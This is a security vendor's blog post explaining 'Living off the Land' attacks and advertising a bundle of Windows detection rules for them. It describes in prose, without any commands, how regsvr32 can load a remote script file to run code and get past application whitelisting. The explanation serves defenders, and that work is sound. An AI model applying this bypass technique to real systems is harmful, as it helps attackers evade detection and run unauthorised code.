Attack, Deconstructed: Living off the Land

What is a “Living off the Land” (LOLBAS) attack?

Here’s how it works!

  1. Company user accesses a compromised website, inserts an infected USB drive, or opens a phishing email.
  2. The attacker scans the machine for weak spots and targets.
  3. The attacker hides malware into an already-existing, white-listed software.
  4. The attacker searches and executes malicious activity under the radar.
  5. The attacker continues to gets data/executes malicious activity using the planted malware, since the software used for cover is white-listed.

We see time and time again that companies are not upgrading their Endpoint Detection & Response (EDR) capabilities. This is a huge vulnerability in IT/network security because LOLBAS attacks exploit the local operating systems (OS) to avoid detection by using tools or features that already exist in the target environment, making it more difficult for defenders to detect or prevent.

Some EDR software lack the capabilities to stop, or even detect, LOLBAS based attacks!

To combat this type of attack, we mapped and developed an out-of-the-box integration rules bundle which leverages built-in windows auditing capabilities to detect such attacks, minimizing an expensive risk with a quick (and easy) solution. The LOLBAS bundle includes around 200 unique detection rules.

One of the LOLBAS rules within the bundle is Regsvr32:

Regsvr32 is a command-line utility to register and unregister OLE controls, such as DLLs and ActiveX controls in the Windows Registry.

An adversary can use this signed Windows binary to achieve signed-binary proxy execution defined by MITRE ATT&CK as technique T1117.

It may be possible to bypass application whitelist solutions because the execution of signed system binaries might be allowed.

The technique is done by calling the command line tool to run a local or remote Windows Script Component (SCT) file, in which VBScript or JavaScript can be used to gain arbitrary code execution. regsvr32.exe is network and proxy aware, the scripts can be loaded by passing a uniform resource locator (URL) to file on an external Web server as an argument during invocation.
This method makes no changes to the Registry as the COM object is not actually registered, only executed.

To learn more about this attack , visit MITRE.

About qmasters

QMasters was founded in 2015 to help Israeli governmental, military, niche security, and municipality offices protect themselves from cyber-attacks. As the cyber security threats grow year after year, so does our list of customers. We are a team of 30+ security experts committed to solving security challenges with the right combination of strategies and technologies.

you might also like:

FortiOS Flaw Exploited as Zero-Day in Attacks

On December 12, Fortinet reported on a heap-based buffer overflow...

תגובה לאירועי אבטחה – Incident Response

לא משנה כמה חזקה ההגנה שלנו תהיה, לפעמים דברים ישתבשו...

ClearPass Vulnerability Alert

Aruba has informed us about a new security advisory for...

VIDEO: Carbon Black Webinar - Investigating an Incident

This video link has expired. Please contact Michelle at [email protected]...

1 2 3 6

Join our newsletter!


linkedin facebook pinterest youtube rss twitter instagram facebook-blank rss-blank linkedin-blank pinterest youtube twitter instagram